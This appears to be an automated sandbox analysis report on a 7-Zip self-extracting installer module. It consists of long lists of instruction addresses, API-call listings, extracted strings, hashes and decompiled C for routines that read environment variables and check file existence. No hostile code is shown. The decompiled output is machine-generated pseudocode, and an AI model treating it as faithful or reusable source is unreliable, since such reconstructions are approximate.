                                          0x00000000
                                          0x00000000
                                          0x00406d46
                                          0x00000000
                                          0x00406d31
                                          0x00406d36
                                          0x00406d4b
                                          0x00406d4b
                                          0x00406d4d
                                          0x00406d76
                                          0x00406d76
                                          0x00406d7b
                                          0x00406d82
                                          0x00406d91
                                          0x00406d9c
                                          0x00406da1
                                          0x00406da8
                                          0x00406dad
                                          0x00406dad
                                          0x00406db2
                                          0x00406db4
                                          0x00406db7
                                          0x00406e83
                                          0x00406e96
                                          0x00000000
                                          0x00406dbd
                                          0x00406dbd
                                          0x00406dc3
                                          0x00406e9b
                                          0x00406e9b
                                          0x00406ea1
                                          0x00406ea3
                                          0x00406eba
                                          0x00406ec5
                                          0x00406edd
                                          0x00406ee2
                                          0x00406ee2
                                          0x00406ee7
                                          0x00406eea
                                          0x00406eef
                                          0x00406ef2
                                          0x00406efd
                                          0x00406efd
                                          0x00406f04
                                          0x00406f19
                                          0x00406f19
                                          0x00406f1f
                                          0x00406f2d
                                          0x00406f2f
                                          0x00406f31
                                          0x00406f38
                                          0x00406f3e
                                          0x00406f40
                                          0x00406f40
                                          0x00406f4b
                                          0x00406f60
                                          0x00406f6a
                                          0x00406f7c
                                          0x00406f7c
                                          0x00406f31
                                          0x00406f81
                                          0x00406f81
                                          0x00406f88
                                          0x00406f8a
                                          0x00406f90
                                          0x00406f99
                                          0x00406f9e
                                          0x00406fa0
                                          0x00406fa2
                                          0x00406fa6
                                          0x00406fb2
                                          0x00406fb7
                                          0x00406fb7
                                          0x00406fa6
                                          0x00406fa0
                                          0x00406f90
                                          0x00406fbc
                                          0x00406fbf
                                          0x00406fc4
                                          0x00406fc7
                                          0x00406fcc
                                          0x00406fcf
                                          0x00406fd4
                                          0x00406fd7
                                          0x00406fdc
                                          0x00406fdf
                                          0x00406fe4
                                          0x00406fe7
                                          0x00406fef
                                          0x00000000
                                          0x00406fef
                                          0x00406f06
                                          0x00406f0d
                                          0x00000000
                                          0x00000000
                                          0x00406f0f
                                          0x00000000
                                          0x00406f0f
                                          0x00406dc9
                                          0x00406de1
                                          0x00406df0
                                          0x00406df5
                                          0x00406df8
                                          0x00406dfd
                                          0x00406e00
                                          0x00406e0a
                                          0x00406e10
                                          0x00406e13
                                          0x00406e52
                                          0x00406e5c
                                          0x00406e70
                                          0x00406e75
                                          0x00406e78
                                          0x00000000
                                          0x00406e7d
                                          0x00406e15
                                          0x00406e1a
                                          0x00406e1c
                                          0x00406e1d
                                          0x00406e22
                                          0x00406e25
                                          0x00406e2a
                                          0x00406e2d
                                          0x00406e32
                                          0x00406e35
                                          0x00406e3a
                                          0x00406e3d
                                          0x00406e42
                                          0x00406e45
                                          0x00406e4a
                                          0x00406295
                                          0x00406295
                                          0x00000000
                                          0x00406295
                                          0x00406db7
                                          0x00406d84
                                          0x00406d8b
                                          0x00406efb
                                          0x00406efb
                                          0x00000000
                                          0x00406efb
                                          0x00000000
                                          0x00406d8b
                                          0x00406d4f
                                          0x00406d54
                                          0x00406d57
                                          0x00406d5c
                                          0x00406d5f
                                          0x00406d64
                                          0x00406d67
                                          0x00406d6c
                                          0x00406d6f
                                          0x00000000
                                          0x00406d6f
                                          0x00406d2f
                                          0x00000000
                                          0x00406c7f
                                          0x00406b76
                                          0x00406b76
                                          0x00406b7d
                                          0x00000000
                                          0x00000000
                                          0x00406b7f
                                          0x00406b89
                                          0x00406b8b
                                          0x00000000
                                          0x00000000
                                          0x00406b8d
                                          0x00406b93
                                          0x00406b99
                                          0x00406b9e
                                          0x00406ba0
                                          0x00000000
                                          0x00000000
                                          0x00406ba2
                                          0x00406ba5
                                          0x00406bab
                                          0x00406bee
                                          0x00406bf3
                                          0x00406bf6
                                          0x00000000
                                          0x00406bfb
                                          0x00406bad
                                          0x00000000
                                          0x00406bb2
                                          0x00406b70
                                          0x00406abd
                                          0x00406ac3
                                          0x00406acb
                                          0x00406ad7
                                          0x00406ae1
                                          0x00406ae6
                                          0x00406ae8
                                          0x00000000
                                          0x00000000
                                          0x00406aee
                                          0x00406af1
                                          0x00406af4
                                          0x00406af7
                                          0x00406afe
                                          0x00406afe
                                          0x00406b01
                                          0x00406b08
                                          0x00406b08
                                          0x00406b0b
                                          0x00406b12
                                          0x00406b1a
                                          0x00000000
                                          0x00406b1a
                                          0x00406b0d
                                          0x00406b10
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406b10
                                          0x00406b03
                                          0x00406b06
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406b06
                                          0x00406af9
                                          0x00406afc
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406afc
                                          0x00406bcf
                                          0x00406bd4
                                          0x00406bd7
                                          0x00406bdc
                                          0x00406bdf
                                          0x00406be4
                                          0x00406be7
                                          0x00000000
                                          0x00406be7
                                          0x00406a50
                                          0x004069bd
                                          0x00000000
                                          0x004069a8
                                          0x004069a8
                                          0x004069ad
                                          0x004069ad
                                          0x00000000
                                          0x004069ad
                                          0x004068d8
                                          0x004068df
                                          0x004068e4
                                          0x004068e6
                                          0x004068e8
                                          0x004068ec
                                          0x004068f2
                                          0x004068f2
                                          0x004068fa
                                          0x00406910
                                          0x0040691a
                                          0x0040692c
                                          0x00000000
                                          0x0040692c
                                          0x004068d6
                                          0x0040687d
                                          0x00406884
                                          0x0040688c
                                          0x00406890
                                          0x00406895
                                          0x00406898
                                          0x00406898
                                          0x00406898
                                          0x0040689b
                                          0x004068a6
                                          0x004068a6
                                          0x00000000
                                          0x004068b1
                                          0x00406715
                                          0x0040671c
                                          0x00000000
                                          0x00000000
                                          0x00406722
                                          0x00406727
                                          0x00406729
                                          0x00000000
                                          0x00000000
                                          0x0040673a
                                          0x00406753
                                          0x00406790
                                          0x004067a9
                                          0x004067ae
                                          0x004067b1
                                          0x004067b6
                                          0x004067b9
                                          0x004067be
                                          0x004067c4
                                          0x004067c9
                                          0x004067cc
                                          0x004067d1
                                          0x004067d4
                                          0x004067d9
                                          0x004067e7
                                          0x004067f0
                                          0x004067f3
                                          0x004067f4
                                          0x004067f9
                                          0x004067fc
                                          0x004067fe
                                          0x00406827
                                          0x0040682c
                                          0x0040682f
                                          0x00406834
                                          0x00406837
                                          0x0040683c
                                          0x0040683f
                                          0x00406844
                                          0x00000000
                                          0x00406844
                                          0x00406800
                                          0x00406805
                                          0x00406808
                                          0x0040680d
                                          0x00406810
                                          0x00406815
                                          0x00406818
                                          0x0040681d
                                          0x00406820
                                          0x00000000
                                          0x00406820
                                          0x004065f6
                                          0x0040660d
                                          0x0040661e
                                          0x00406625
                                          0x00406631
                                          0x00406631
                                          0x00406633
                                          0x00406634
                                          0x00406634
                                          0x00406636
                                          0x00406636
                                          0x00406644
                                          0x00406646
                                          0x00406647
                                          0x00406647
                                          0x0040664c
                                          0x0040664e
                                          0x0040664e
                                          0x00406650
                                          0x00406652
                                          0x00406653
                                          0x0040665b
                                          0x00406665
                                          0x00406665
                                          0x0040666b
                                          0x00406671
                                          0x00406671
                                          0x00406671
                                          0x00406674
                                          0x00406677
                                          0x00406679
                                          0x0040667f
                                          0x00406680
                                          0x00406681
                                          0x00406683
                                          0x00406685
                                          0x00406689
                                          0x0040668a
                                          0x00406692
                                          0x00406692
                                          0x00406692
                                          0x00406685
                                          0x0040669c
                                          0x004066a4
                                          0x004066a7
                                          0x004066a8
                                          0x004066a8
                                          0x004066ad
                                          0x004066af
                                          0x004066c3
                                          0x004066c8
                                          0x004066cf
                                          0x00000000
                                          0x004066cf
                                          0x004065c5
                                          0x004065c8
                                          0x004065ce
                                          0x00000000
                                          0x004065ce
                                          0x004064f6
                                          0x004064fd
                                          0x00406502
                                          0x00406504
                                          0x00000000
                                          0x00000000
                                          0x00406506
                                          0x0040650a
                                          0x0040650c
                                          0x0040650c
                                          0x0040650c
                                          0x0040650f
                                          0x00406512
                                          0x00406515
                                          0x00000000
                                          0x0040651b
                                          0x0040651b
                                          0x0040651b
                                          0x0040651f
                                          0x00000000
                                          0x00000000
                                          0x00406521
                                          0x00406524
                                          0x00406527
                                          0x0040652a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040652a
                                          0x0040652c
                                          0x00406530
                                          0x00000000
                                          0x00000000
                                          0x00406536
                                          0x0040653b
                                          0x00406540
                                          0x00406542
                                          0x00000000
                                          0x00000000
                                          0x00406548
                                          0x0040654a
                                          0x0040654c
                                          0x00406551
                                          0x00406554
                                          0x00406559
                                          0x0040655c
                                          0x00000000
                                          0x0040655c
                                          0x00406515
                                          0x004064e0
                                          0x004064e0
                                          0x004064e3
                                          0x00000000
                                          0x0040649e
                                          0x004064a8
                                          0x004064ad
                                          0x004064b0
                                          0x00406238
                                          0x00406238
                                          0x00000000
                                          0x00406238
                                          0x0040649c
                                          0x00406230
                                          0x00406234
                                          0x0040623e
                                          0x00406246
                                          0x00406249
                                          0x00406249
                                          0x0040624c
                                          0x00406350
                                          0x0040635f
                                          0x0040635f
                                          0x0040635f
                                          0x00406362
                                          0x00000000
                                          0x00000000
                                          0x0040635c
                                          0x0040635c
                                          0x0040635c
                                          0x00406364
                                          0x0040636b
                                          0x0040636d
                                          0x00406372
                                          0x00406374
                                          0x00000000
                                          0x00000000
                                          0x00406376
                                          0x0040637a
                                          0x00406387
                                          0x00406387
                                          0x0040638a
                                          0x0040638d
                                          0x0040637e
                                          0x00406382
                                          0x00000000
                                          0x00000000
                                          0x00406384
                                          0x00406384
                                          0x00406384
                                          0x00000000
                                          0x00406384
                                          0x0040638f
                                          0x00406392
                                          0x00406398
                                          0x0040639b
                                          0x004063a0
                                          0x004063a5
                                          0x004063ac
                                          0x004063ae
                                          0x004063b6
                                          0x004063b6
                                          0x00000000
                                          0x004063ae
                                          0x00000000
                                          0x0040637c
                                          0x00406253
                                          0x00406253
                                          0x00406254
                                          0x0040633e
                                          0x00406349
                                          0x00000000
                                          0x00406349
                                          0x0040625a
                                          0x0040625a
                                          0x0040625b
                                          0x004062b9
                                          0x004062bc
                                          0x004062fb
                                          0x004062fb
                                          0x004062fe
                                          0x004062fe
                                          0x00406305
                                          0x00406309
                                          0x00406326
                                          0x00406326
                                          0x00406330
                                          0x00406330
                                          0x00000000
                                          0x00406330
                                          0x0040630b
                                          0x0040630b
                                          0x0040630f
                                          0x00406316
                                          0x0040631b
                                          0x00406320
                                          0x00000000
                                          0x00000000
                                          0x00406322
                                          0x00406324
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406324
                                          0x004062be
                                          0x004062c3
                                          0x00000000
                                          0x00000000
                                          0x004062c9
                                          0x004062e5
                                          0x004062e5
                                          0x004062e8
                                          0x004062eb
                                          0x00000000
                                          0x00000000
                                          0x004062ce
                                          0x004062d2
                                          0x00000000
                                          0x00000000
                                          0x004062dd
                                          0x004062e2
                                          0x004062e2
                                          0x004062e2
                                          0x004062ed
                                          0x004062f4
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004062f6
                                          0x0040625d
                                          0x0040625d
                                          0x00406260
                                          0x00406271
                                          0x00406276
                                          0x00000000
                                          0x00000000
                                          0x00406280
                                          0x00406280
                                          0x00406283
                                          0x004062b3
                                          0x00000000
                                          0x004062b3
                                          0x00406285
                                          0x00406285
                                          0x00406286
                                          0x004062a7
                                          0x00000000
                                          0x004062a7
                                          0x00406288
                                          0x00406288
                                          0x00406289
                                          0x004062a3
                                          0x00000000
                                          0x004062a3
                                          0x0040628b
                                          0x0040628b
                                          0x0040628c
                                          0x00406299
                                          0x00000000
                                          0x00406299
                                          0x0040628e
                                          0x0040628f
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040628f
                                          0x00406262
                                          0x00406265
                                          0x00000000
                                          0x00406267
                                          0x00406267
                                          0x00000000
                                          0x00406267
                                          0x00406265
                                          0x00406236
                                          0x00406236
                                          0x00000000
                                          0x00406201
                                          0x00406203
                                          0x00406203
                                          0x00406204
                                          0x00406206
                                          0x00406207
                                          0x0040620d
                                          0x00000000
                                          0x0040620d
                                          0x004061bc
                                          0x004061c3
                                          0x00000000
                                          0x004061c3
                                          0x00406183
                                          0x00406183
                                          0x00406188
                                          0x00406188
                                          0x0040618a
                                          0x0040618a
                                          0x0040618d
                                          0x00406192
                                          0x00406195
                                          0x0040619a
                                          0x0040619d
                                          0x004061a5
                                          0x0040700a
                                          0x00407011
                                          0x00407011
                                          0x0040614e
                                          0x0040614e
                                          0x00406152
                                          0x00406159
                                          0x00406162
                                          0x00406164
                                          0x00406164
                                          0x0040616a
                                          0x0040616a
                                          0x0040616d
                                          0x00000000
                                          0x0040616a
                                          0x00406146

                                          APIs
                                          • ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 00406037
                                            • Part of subcall function 00403834: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00406043,?,00000000), ref: 00403840
                                            • Part of subcall function 00403834: CreateWindowExW.USER32 ref: 0040385D
                                            • Part of subcall function 00403834: GetDesktopWindow.USER32 ref: 00403869
                                            • Part of subcall function 00403834: GetWindowRect.USER32 ref: 00403870
                                            • Part of subcall function 00403834: SetWindowPos.USER32(00000000,00000000,?,00406043,00000000,00000000,00000004), ref: 00403894
                                            • Part of subcall function 00403834: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 004038A4
                                            • Part of subcall function 00403834: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004038B1
                                            • Part of subcall function 00403834: DispatchMessageW.USER32 ref: 004038BB
                                            • Part of subcall function 00403834: KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,00406043,?,00000000), ref: 004038C4
                                          • GetVersionExW.KERNEL32(?,?,00000000), ref: 00406054
                                          • MessageBoxA.USER32 ref: 00407001
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                            • Part of subcall function 0040541A: LoadLibraryA.KERNEL32(kernel32,?,?,00000000), ref: 0040542B
                                            • Part of subcall function 0040541A: #17.COMCTL32(?,?,00000000), ref: 00405436
                                            • Part of subcall function 0040541A: SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,00000000), ref: 004054BB
                                            • Part of subcall function 0040541A: wsprintfW.USER32 ref: 004054CF
                                          • GetCommandLineW.KERNEL32(?,00000000), ref: 004060AD
                                            • Part of subcall function 00414864: ??2@YAPAXI@Z.MSVCRT ref: 00414896
                                            • Part of subcall function 00414864: ??3@YAXPAX@Z.MSVCRT ref: 0041489F
                                            • Part of subcall function 00414864: memcpy.MSVCRT ref: 004148B7
                                            • Part of subcall function 0040457E: ??3@YAXPAX@Z.MSVCRT ref: 004045F1
                                            • Part of subcall function 0040457E: ??3@YAXPAX@Z.MSVCRT ref: 0040460D
                                            • Part of subcall function 0040457E: ??3@YAXPAX@Z.MSVCRT ref: 00404615
                                            • Part of subcall function 0040457E: ??3@YAXPAX@Z.MSVCRT ref: 00404680
                                            • Part of subcall function 00404F69: ??3@YAXPAX@Z.MSVCRT ref: 00404FD0
                                            • Part of subcall function 00404F69: ??3@YAXPAX@Z.MSVCRT ref: 00404FD9
                                            • Part of subcall function 00404F69: ??3@YAXPAX@Z.MSVCRT ref: 00404FE1
                                          • GetCommandLineW.KERNEL32(00000001,00000001,00000001,00000000,?,00000000), ref: 004060F3
                                            • Part of subcall function 0040420B: wcsncpy.MSVCRT ref: 00404239
                                            • Part of subcall function 0040420B: ??3@YAXPAX@Z.MSVCRT ref: 00404244
                                          • wsprintfW.USER32 ref: 00406119
                                            • Part of subcall function 004056BA: lstrlenW.KERNEL32(sfxlang,?,73B749F0,?,00000001,00406144,00000001), ref: 004056FB
                                            • Part of subcall function 004056BA: lstrlenW.KERNEL32(sfxlang), ref: 00405700
                                          • _wtol.MSVCRT(-00000002,00000001), ref: 00406152
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040618D
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00406195
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040619D
                                          • GetModuleFileNameW.KERNEL32(00000000,00000000,00000208,00000208,00000001), ref: 004061F7
                                          • _wtol.MSVCRT(-00000002), ref: 0040630F
                                            • Part of subcall function 004143C2: ??2@YAPAXI@Z.MSVCRT ref: 004143CA
                                            • Part of subcall function 00405319: ??3@YAXPAX@Z.MSVCRT ref: 0040535D
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004064E3
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00406554
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$Window$??2@Message$CommandLineModuleTimer_wtollstrlenwsprintf$?_set_new_handler@@CreateDesktopDispatchFileFolderHandleKillLibraryLoadNamePathRectSpecialVersionmemcpywcsncpy
                                          • String ID: " -$123456789ABCDEFGHJKMNPQRSTUVWXYZ$7-Zip SFX$7ZipSfx.%03x$AutoInstall$BeginPrompt$BeginPromptTimeout$D(B$D(B$Delete$ExecuteFile$ExecuteOnLoad$FinishMessage$HelpText$InstallPath$PreExtract$RunProgram$SelfDelete$SetEnvironment$SfxAuthor$SfxString%d$SfxVarApiPath$SfxVarCmdLine0$SfxVarModulePlatform$SfxVarSystemLanguage$SfxVarSystemPlatform$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$X!B$XhV$XhV$\(B$`gV$h(B$setup.exe$sfxconfig$sfxelevation$sfxlang$sfxtest$sfxversion$sfxwaitall$x86
                                          • API String ID: 15977253-312728069
                                          • Opcode ID: 2982219d68ed9a4b1b286f2eb04f31c18d54d1d33f0a4897e7116be29f2663fe
                                          • Instruction ID: a556a6a5a5f07645b6d0a54752984156d57e7a988d3b1907c5a6a98372b60f7b
                                          • Opcode Fuzzy Hash: 2982219d68ed9a4b1b286f2eb04f31c18d54d1d33f0a4897e7116be29f2663fe
                                          • Instruction Fuzzy Hash: 0C92F470A00215ABDB24BB61DD41BAE3661EF80708F55403FF906B62E2DBBC9C95CB5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403CE0, Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 148stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E00403CE0(WCHAR* __ecx) {
				WCHAR* _v8;
				long _v12;
				long _v16;
				short _v104;
				short _v168;
				WCHAR* _t52;
				short* _t55;
				WCHAR* _t60;
				int _t61;
				WCHAR* _t65;
				long _t67;
				WCHAR* _t68;
				WCHAR* _t69;
				int _t71;
				intOrPtr* _t73;
				char* _t78;
				WCHAR* _t79;
				signed int _t94;
				signed int _t96;
				int _t101;
				WCHAR* _t102;
				signed int _t103;
				signed int _t104;
				intOrPtr _t107;

				_t79 = __ecx;
				_t103 = 0;
				_v8 = __ecx;
				_t107 =  *0x422158; // 0x1
				if(_t107 == 0) {
					L4:
					_t104 = _t103 << 4;
					if( *((intOrPtr*)(_t104 + 0x422158)) != 0) {
						_v16 = GetLastError();
						wsprintfW( &_v104, L"SfxString%d", _v8);
						_v12 = GetEnvironmentVariableW( &_v104, 0, 0);
						__eflags = GetLastError();
						if(__eflags != 0) {
							L17:
							SetLastError(_v16);
							_t28 = _t104 + 0x422164; // 0x46550e8
							_t52 =  *_t28;
							__eflags = _t52;
							if(_t52 == 0) {
								_t29 = _t104 + 0x42215c; // 0x41e930
								_t78 =  *_t29;
								__eflags =  *(_t104 + 0x422160) - _t52;
								if(__eflags != 0) {
									__eflags = E00403C85(_t52) -  *0x41ea18; // 0x419
									if(__eflags == 0) {
										_t31 = _t104 + 0x422160; // 0x41e848
										_t78 =  *_t31;
									}
								}
								_t32 = lstrlenA(_t78) + 1; // 0x1
								_t101 = _t32;
								_t94 = 2;
								_t33 = _t101 + 2; // 0x3
								_t55 = _t33 * _t94;
								_push( ~(0 | __eflags > 0x00000000) | _t55);
								L0041C16C();
								__eflags =  *0x42211c - 0xffffffff;
								 *(_t104 + 0x422164) = _t55;
								if( *0x42211c == 0xffffffff) {
									 *0x42211c =  *0x42211c & 0x00000000;
									_t60 = GetLocaleInfoW( *0x422730 & 0x0000ffff, 0x1004,  &_v168, 0x1f);
									__eflags = _t60;
									if(_t60 > 0) {
										_t61 =  &_v168;
										__imp___wtol(_t61);
										 *0x42211c = _t61;
									}
								}
								_t43 = _t101 + 1; // 0x2
								_t44 = _t104 + 0x422164; // 0x46550e8
								MultiByteToWideChar( *0x42211c, 0, _t78, _t101,  *_t44, _t43);
								_t45 = _t104 + 0x422164; // 0x46550e8
								_t52 =  *_t45;
							}
							return _t52;
						}
						_t96 = 2;
						_t65 = (_v12 + 2) * _t96;
						_push( ~(0 | __eflags > 0x00000000) | _t65); // executed
						L0041C16C(); // executed
						_v8 = _t65;
						_t67 = GetEnvironmentVariableW( &_v104, _t65, _v12 + 1);
						__eflags = _t67 - _v12;
						if(_t67 > _v12) {
							L14:
							_push(_v8);
							L15:
							L0041C160();
							L16:
							goto L17;
						}
						_t68 = GetLastError();
						__eflags = _t68;
						if(_t68 != 0) {
							goto L14;
						}
						_t20 = _t104 + 0x422164; // 0x46550e8
						_t69 =  *_t20;
						__eflags = _t69;
						if(_t69 == 0) {
							 *(_t104 + 0x422164) = _v8;
							goto L17;
						}
						_t102 = _v8;
						_t71 = lstrcmpiW(_t69, _t102);
						__eflags = _t71;
						if(_t71 == 0) {
							_push(_t102);
							goto L15;
						}
						_t22 = _t104 + 0x422164; // 0x46550e8
						_push( *_t22);
						L0041C160();
						 *(_t104 + 0x422164) = _t102;
						goto L16;
					}
					return 0x41da3c;
				} else {
					_t73 = 0x422158;
					while( *_t73 != _t79) {
						_t103 = _t103 + 1;
						_t2 = (_t103 << 4) + 0x422158; // 0x30000000
						_t73 = _t2;
						if( *_t73 != 0) {
							continue;
						}
						goto L4;
					}
					goto L4;
				}
			}



























                                          0x00403ce0
                                          0x00403ced
                                          0x00403cef
                                          0x00403cf2
                                          0x00403cf8
                                          0x00403d13
                                          0x00403d13
                                          0x00403d1c
                                          0x00403d34
                                          0x00403d40
                                          0x00403d57
                                          0x00403d5c
                                          0x00403d5e
                                          0x00403dd8
                                          0x00403ddb
                                          0x00403de1
                                          0x00403de1
                                          0x00403de7
                                          0x00403de9
                                          0x00403def
                                          0x00403def
                                          0x00403df5
                                          0x00403dfb
                                          0x00403e02
                                          0x00403e08
                                          0x00403e0a
                                          0x00403e0a
                                          0x00403e0a
                                          0x00403e08
                                          0x00403e17
                                          0x00403e17
                                          0x00403e1e
                                          0x00403e1f
                                          0x00403e22
                                          0x00403e2b
                                          0x00403e2c
                                          0x00403e31
                                          0x00403e39
                                          0x00403e3f
                                          0x00403e41
                                          0x00403e5e
                                          0x00403e64
                                          0x00403e66
                                          0x00403e68
                                          0x00403e6f
                                          0x00403e76
                                          0x00403e76
                                          0x00403e66
                                          0x00403e7b
                                          0x00403e7f
                                          0x00403e8f
                                          0x00403e95
                                          0x00403e95
                                          0x00403e95
                                          0x00000000
                                          0x00403e9b
                                          0x00403d6a
                                          0x00403d6b
                                          0x00403d74
                                          0x00403d75
                                          0x00403d81
                                          0x00403d88
                                          0x00403d8a
                                          0x00403d8d
                                          0x00403dcf
                                          0x00403dcf
                                          0x00403dd2
                                          0x00403dd2
                                          0x00403dd7
                                          0x00000000
                                          0x00403dd7
                                          0x00403d8f
                                          0x00403d91
                                          0x00403d93
                                          0x00000000
                                          0x00000000
                                          0x00403d95
                                          0x00403d95
                                          0x00403d9b
                                          0x00403d9d
                                          0x00403dc7
                                          0x00000000
                                          0x00403dc7
                                          0x00403d9f
                                          0x00403da4
                                          0x00403daa
                                          0x00403dac
                                          0x00403dc1
                                          0x00000000
                                          0x00403dc1
                                          0x00403dae
                                          0x00403dae
                                          0x00403db4
                                          0x00403db9
                                          0x00000000
                                          0x00403db9
                                          0x00000000
                                          0x00403cfa
                                          0x00403cfa
                                          0x00403cff
                                          0x00403d03
                                          0x00403d09
                                          0x00403d09
                                          0x00403d11
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00403d11
                                          0x00000000
                                          0x00403cff

                                          APIs
                                          • GetLastError.KERNEL32(?,?,00000000), ref: 00403D2F
                                          • wsprintfW.USER32 ref: 00403D40
                                          • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00403D55
                                          • GetLastError.KERNEL32 ref: 00403D5A
                                          • ??2@YAPAXI@Z.MSVCRT ref: 00403D75
                                          • GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00403D88
                                          • GetLastError.KERNEL32 ref: 00403D8F
                                          • lstrcmpiW.KERNEL32(046550E8,00000000), ref: 00403DA4
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00403DB4
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00403DD2
                                          • SetLastError.KERNEL32(?), ref: 00403DDB
                                          • lstrlenA.KERNEL32(0041E930), ref: 00403E11
                                          • ??2@YAPAXI@Z.MSVCRT ref: 00403E2C
                                          • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00403E5E
                                          • _wtol.MSVCRT(?), ref: 00403E6F
                                          • MultiByteToWideChar.KERNEL32(00000000,0041E930,00000001,046550E8,00000002), ref: 00403E8F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                          • String ID: SfxString%d$X!B
                                          • API String ID: 2117570002-850189017
                                          • Opcode ID: e9b4f3f5a05fcb842e9a35ba8f614be3a194fe9cdc65ba7076de621a097104dd
                                          • Instruction ID: 68e66196db71daaa07867c957ec585132196606c956435e67b7422de32b8828f
                                          • Opcode Fuzzy Hash: e9b4f3f5a05fcb842e9a35ba8f614be3a194fe9cdc65ba7076de621a097104dd
                                          • Instruction Fuzzy Hash: 71519171A00205BFDB20DF64DE45DAB7BBCEF44741F50453AE206E6290EBB4AE61CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409931, Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E00409931(void* __eax, WCHAR* _a4, intOrPtr _a8) {
				struct _WIN32_FIND_DATAW _v596;
				void* _t16;
				void* _t18;
				intOrPtr _t36;
				intOrPtr* _t38;

				_push(0x24);
				L0041C16C();
				if(__eax == 0) {
					_t38 = 0;
				} else {
					_t38 = E00415241(__eax);
				}
				if(E0041404F(_a4) != 0) {
					_t36 = _a8;
					E004160A2(_t36, _t38);
					_t16 = FindFirstFileW(_a4,  &_v596); // executed
					if(_t16 == 0xffffffff) {
						if(_t38 != 0) {
							 *((intOrPtr*)( *_t38 + 0x14))(1);
						}
						_t18 = 1;
					} else {
						 *((intOrPtr*)(_t36 + 8)) = _v596.nFileSizeLow;
						 *((intOrPtr*)(_t36 + 0xc)) = _v596.nFileSizeHigh;
						FindClose(_t16); // executed
						_t18 = 0;
					}
					return _t18;
				} else {
					if(_t38 != 0) {
						 *((intOrPtr*)( *_t38 + 0x14))(1);
					}
					return 1;
				}
			}








                                          0x0040993b
                                          0x0040993d
                                          0x00409945
                                          0x00409952
                                          0x00409947
                                          0x0040994e
                                          0x0040994e
                                          0x00409961
                                          0x00409976
                                          0x0040997c
                                          0x0040998b
                                          0x00409994
                                          0x004099b5
                                          0x004099bd
                                          0x004099bd
                                          0x004099c2
                                          0x00409996
                                          0x0040999c
                                          0x004099a6
                                          0x004099a9
                                          0x004099af
                                          0x004099af
                                          0x00000000
                                          0x00409963
                                          0x00409965
                                          0x0040996d
                                          0x0040996d
                                          0x00000000
                                          0x00409972

                                          APIs
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040993D
                                          • FindFirstFileW.KERNELBASE(?,?,00000000,00000000,?), ref: 0040998B
                                          • FindClose.KERNELBASE(00000000), ref: 004099A9
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Find$??2@CloseFileFirst
                                          • String ID:
                                          • API String ID: 4002974997-0
                                          • Opcode ID: 91c647426eba9d3caa0601590869d6121fa3b5198e89070721a6e1596570726f
                                          • Instruction ID: 04f35bf0448d31e89553be1a3bfedde72a875c1ede13cb4c157a2b7218669a26
                                          • Opcode Fuzzy Hash: 91c647426eba9d3caa0601590869d6121fa3b5198e89070721a6e1596570726f
                                          • Instruction Fuzzy Hash: 62112CB1600111ABCB10AF25CC48AAF7BA4AF48714F00443EF846EB3D2C738DC41CB99
